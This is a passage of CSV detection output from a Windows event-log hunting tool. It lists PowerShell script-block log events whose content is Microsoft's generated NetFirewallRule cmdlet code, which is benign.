[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', 